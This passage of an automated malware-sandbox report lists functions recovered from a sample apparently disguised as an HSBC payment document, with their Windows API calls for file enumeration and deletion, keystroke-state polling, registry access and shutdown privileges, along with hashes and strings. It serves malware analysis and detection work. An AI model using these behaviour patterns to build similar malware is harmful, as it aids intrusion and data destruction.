                                                                                                                                • Opcode Fuzzy Hash: 62f4728737e2b0314c353535b9ad08e91fd7a8d78fb236d92e76f08855711f05
                                                                                                                                • Instruction Fuzzy Hash: B2023975600611DFCB14EF24D859E2AB7E5EF8A310F08895DF9899B362DB38EC41CB85
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 0D|$0E|$0F|$3cs$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG|$_s
                                                                                                                                • API String ID: 0-3244020149
                                                                                                                                • Opcode ID: 24a8c839b99452c70a4f86b7242eca7867018927754966b49cb8775799ae5b2b
                                                                                                                                • Instruction ID: abc8e0bb9b6b57f854f9bbf6022517075a25cb87edadb4fb801b502b587c407e
                                                                                                                                • Opcode Fuzzy Hash: 24a8c839b99452c70a4f86b7242eca7867018927754966b49cb8775799ae5b2b
                                                                                                                                • Instruction Fuzzy Hash: 407260B5E00219DBDF14CF58C8807ADB7B5FF44750F64C16AE949EB291EB389A41CB90
                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0078F113
                                                                                                                                • _wcscmp.LIBCMT ref: 0078F128
                                                                                                                                • _wcscmp.LIBCMT ref: 0078F13F
                                                                                                                                  • Part of subcall function 00784385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007843A0
                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0078F16E
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0078F179
                                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0078F195
                                                                                                                                • _wcscmp.LIBCMT ref: 0078F1BC
                                                                                                                                • _wcscmp.LIBCMT ref: 0078F1D3
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0078F1E5
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(007D8920), ref: 0078F203
                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0078F20D
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0078F21A
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0078F22C
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                • String ID: *.*
                                                                                                                                • API String ID: 1824444939-438819550
                                                                                                                                • Opcode ID: 84e2f6fad7901cac6bac4f6e40d5fa8f3df25de4abbb5516a72b4db08ee961f7
                                                                                                                                • Instruction ID: bea906ef70414d45c20191ad1476cb6c4e5b5bd9fc89906769471fce26214130
                                                                                                                                • Opcode Fuzzy Hash: 84e2f6fad7901cac6bac4f6e40d5fa8f3df25de4abbb5516a72b4db08ee961f7
                                                                                                                                • Instruction Fuzzy Hash: 3231E73654021DAADF10BBB4EC59BEEB7BCAF85360F104175E804E21A0DB38DE45CB68
                                                                                                                                APIs
                                                                                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0078A20F
                                                                                                                                • __swprintf.LIBCMT ref: 0078A231
                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0078A26E
                                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0078A293
                                                                                                                                • _memset.LIBCMT ref: 0078A2B2
                                                                                                                                • _wcsncpy.LIBCMT ref: 0078A2EE
                                                                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0078A323
                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0078A32E
                                                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 0078A337
                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0078A341
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                • String ID: :$\$\??\%s
                                                                                                                                • API String ID: 2733774712-3457252023
                                                                                                                                • Opcode ID: c45c89612674d4525d0e1fb60e92f5a02694ce870c6723320975fe8ad8d7a8ad
                                                                                                                                • Instruction ID: 06c2fa453dcab1567c918baffbf8e7522404d899263e46953d0b794eb1f34b64
                                                                                                                                • Opcode Fuzzy Hash: c45c89612674d4525d0e1fb60e92f5a02694ce870c6723320975fe8ad8d7a8ad
                                                                                                                                • Instruction Fuzzy Hash: 3D318EB1940109BBDB219FA0DC49FEB37BCEF89740F1041B6F508D2160EB7896448B25
                                                                                                                                APIs
                                                                                                                                • GetKeyboardState.USER32(?), ref: 00780097
                                                                                                                                • SetKeyboardState.USER32(?), ref: 00780102
                                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00780122
                                                                                                                                • GetKeyState.USER32(000000A0), ref: 00780139
                                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00780168
                                                                                                                                • GetKeyState.USER32(000000A1), ref: 00780179
                                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 007801A5
                                                                                                                                • GetKeyState.USER32(00000011), ref: 007801B3
                                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 007801DC
                                                                                                                                • GetKeyState.USER32(00000012), ref: 007801EA
                                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00780213
                                                                                                                                • GetKeyState.USER32(0000005B), ref: 00780221
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 541375521-0
                                                                                                                                • Opcode ID: e1dabb61a64b83f86965786d5fc5ee6b758623e382b190c2e18e9ab34b5c76a3
                                                                                                                                • Instruction ID: 4b84743c4657321d4e392361706be645e58354150cdb9df2a6664a15d724eb3c
                                                                                                                                • Opcode Fuzzy Hash: e1dabb61a64b83f86965786d5fc5ee6b758623e382b190c2e18e9ab34b5c76a3
                                                                                                                                • Instruction Fuzzy Hash: F451DB209447886DFB75FBA088597EABFB49F01380F084599D5C2565C3DAAC9B8CC7E1
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 007A0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0079FDAD,?,?), ref: 007A0E31
                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007A04AC
                                                                                                                                  • Part of subcall function 00729837: __itow.LIBCMT ref: 00729862
                                                                                                                                  • Part of subcall function 00729837: __swprintf.LIBCMT ref: 007298AC
                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007A054B
                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007A05E3
                                                                                                                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007A0822
                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 007A082F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1240663315-0
                                                                                                                                • Opcode ID: 53fdc817969d784f6137202f5f46c7dbfea197f96dfb145eff68820e380fa200
                                                                                                                                • Instruction ID: f11164dc557c2e0801f42ff14b2b4f36eea2a26700114f74ef0b0bea8f3460f9
                                                                                                                                • Opcode Fuzzy Hash: 53fdc817969d784f6137202f5f46c7dbfea197f96dfb145eff68820e380fa200
                                                                                                                                • Instruction Fuzzy Hash: 55E13D71604214EFCB14DF24C895E2ABBE5FF8A314F04896DF94ADB261DA38ED05CB91
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00729837: __itow.LIBCMT ref: 00729862
                                                                                                                                  • Part of subcall function 00729837: __swprintf.LIBCMT ref: 007298AC
                                                                                                                                • CoInitialize.OLE32 ref: 00798403
                                                                                                                                • CoUninitialize.OLE32 ref: 0079840E
                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,007B2BEC,?), ref: 0079846E
                                                                                                                                • IIDFromString.OLE32(?,?), ref: 007984E1
                                                                                                                                • VariantInit.OLEAUT32(?), ref: 0079857B
                                                                                                                                • VariantClear.OLEAUT32(?), ref: 007985DC
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                • API String ID: 834269672-1287834457
                                                                                                                                • Opcode ID: aee06a36967ba8c740d04e4aad6bfc3ab0186d1895775aefa1dcb25588f85ab9
                                                                                                                                • Instruction ID: 3252d0c50f525aa63932d34359b997eda0aa04081c2ae151d59518767d9833eb
                                                                                                                                • Opcode Fuzzy Hash: aee06a36967ba8c740d04e4aad6bfc3ab0186d1895775aefa1dcb25588f85ab9
                                                                                                                                • Instruction Fuzzy Hash: 3361C070608312DFCB50DF64E848F6AB7E4AF4A754F044419F9859B2A1CB78ED48CB93
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1737998785-0
                                                                                                                                • Opcode ID: 8ddfa60449ab414f350ed1aabde932e4b84777f4f7a842408dec4e5b34b211c9
                                                                                                                                • Instruction ID: 20798b5da3f28cabfaabef2b59eb4424234b1de4e586663e7188da384cb5c03c
                                                                                                                                • Opcode Fuzzy Hash: 8ddfa60449ab414f350ed1aabde932e4b84777f4f7a842408dec4e5b34b211c9
                                                                                                                                • Instruction Fuzzy Hash: 2221AD35201614DFDB10AF60EC09F6D7BA8FF45310F04C02AFA46DB2A1CB38A802CB48
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00724750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00724743,?,?,007237AE,?), ref: 00724770
                                                                                                                                  • Part of subcall function 00784A31: GetFileAttributesW.KERNEL32(?,0078370B), ref: 00784A32
                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 007838A3
                                                                                                                                • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0078394B
                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0078395E
                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0078397B
                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0078399D
                                                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?), ref: 007839B9
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                                                • String ID: \*.*
                                                                                                                                • API String ID: 4002782344-1173974218
                                                                                                                                • Opcode ID: 0beb8d4c92bfbd090482224784b8513e6f305a06659fdd0d8a327abbabcf6867
                                                                                                                                • Instruction ID: 7ec83d60b68094c37d8255f53031fba433ecb97e843d578e258c22d6bf170032
                                                                                                                                • Opcode Fuzzy Hash: 0beb8d4c92bfbd090482224784b8513e6f305a06659fdd0d8a327abbabcf6867
                                                                                                                                • Instruction Fuzzy Hash: 5651CD3184115DEACF05FBA4EA969EDB778AF11300F604069E846B7192EF396F09CB61
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22
                                                                                                                                • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0078F440
                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 0078F470
                                                                                                                                • _wcscmp.LIBCMT ref: 0078F484
                                                                                                                                • _wcscmp.LIBCMT ref: 0078F49F
                                                                                                                                • FindNextFileW.KERNEL32(?,?), ref: 0078F53D
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0078F553
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                                • String ID: *.*
                                                                                                                                • API String ID: 713712311-438819550
                                                                                                                                • Opcode ID: a20395d07e9896f8e3847f7d29f4a0bdd6fcfc79f5f9204753a6843974a829a4
                                                                                                                                • Instruction ID: 674d563e8852d1a4206446eddce663dcc8d9a85745021dc4b3e4c15d0d4b7568
                                                                                                                                • Opcode Fuzzy Hash: a20395d07e9896f8e3847f7d29f4a0bdd6fcfc79f5f9204753a6843974a829a4
                                                                                                                                • Instruction Fuzzy Hash: EC415E71940219DFCF14EFA4DC49AEEBBB4FF05310F14456AE819A2191DB389E95CF60
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __itow__swprintf
                                                                                                                                • String ID: 3cs$_s
                                                                                                                                • API String ID: 674341424-944816363
                                                                                                                                • Opcode ID: 244b6b610868cd047ae30acfc3c3db29635bac460e2bf66e1d1248b9983f7698
                                                                                                                                • Instruction ID: 20a7a1662b433708eaba50c82d4a2d046a010718ce83f44440a25d81ccfe3a6d
                                                                                                                                • Opcode Fuzzy Hash: 244b6b610868cd047ae30acfc3c3db29635bac460e2bf66e1d1248b9983f7698
                                                                                                                                • Instruction Fuzzy Hash: 7222BB71608350DFE724DF24C885B6EB7E4BF84310F44492CF99A97292DB39EA04CB92
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4104443479-0
                                                                                                                                • Opcode ID: 398223feb28f2a1ddc71a62a9b3477e0c63418d06afabc95f246e09e6d3badba
                                                                                                                                • Instruction ID: 0396e9e6a6d4b9a36e719e12783e09c46e4170faaff2252e5ae480b6d1efea36
                                                                                                                                • Opcode Fuzzy Hash: 398223feb28f2a1ddc71a62a9b3477e0c63418d06afabc95f246e09e6d3badba
                                                                                                                                • Instruction Fuzzy Hash: CB129D70A00619DFDF14DFA5D985AEEB7F5FF48300F108529E44AE7251EB3AA920CB91
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00724750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00724743,?,?,007237AE,?), ref: 00724770
                                                                                                                                  • Part of subcall function 00784A31: GetFileAttributesW.KERNEL32(?,0078370B), ref: 00784A32
                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00783B89
                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 00783BD9
                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00783BEA
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00783C01
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00783C0A
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                • String ID: \*.*
                                                                                                                                • API String ID: 2649000838-1173974218
                                                                                                                                • Opcode ID: fbf009fdcc989ef85b8a887277d680e30b34657596cf8b3e0c750df005c6cb4d
                                                                                                                                • Instruction ID: 36d15142befff67dfc8f4aab176e34f529e07b1d2cd31329eefe6e74488047d8
                                                                                                                                • Opcode Fuzzy Hash: fbf009fdcc989ef85b8a887277d680e30b34657596cf8b3e0c750df005c6cb4d
                                                                                                                                • Instruction Fuzzy Hash: F431A171048395DBC304FF68D9959AFBBE8BE92310F404E2DF4D592191EB29DA08C767
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 007787E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0077882B
                                                                                                                                  • Part of subcall function 007787E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00778858
                                                                                                                                  • Part of subcall function 007787E1: GetLastError.KERNEL32 ref: 00778865
                                                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 007851F9
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                • String ID: $@$SeShutdownPrivilege
                                                                                                                                • API String ID: 2234035333-194228
                                                                                                                                • Opcode ID: e1d2531754014bfb0d9390c098686e525308ee5eb2861e9ed433946641705fff
                                                                                                                                • Instruction ID: 5af88e3cae4c2c9e248fc31f6b36b4fa8b3c790e141739f8a2741f02cad7088d
                                                                                                                                • Opcode Fuzzy Hash: e1d2531754014bfb0d9390c098686e525308ee5eb2861e9ed433946641705fff
                                                                                                                                • Instruction Fuzzy Hash: CE012BB17D16156BFB2872B89C8EFBB7258FB05781F204425F957E20D2DD5D1C008794
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: BuffCharUpper
                                                                                                                                • String ID: pb~$%{
                                                                                                                                • API String ID: 3964851224-2839119673
                                                                                                                                • Opcode ID: 788ed155929db43feb767ce9b3d208ee33edb11c8a47d0477f8c6b3d472175c7
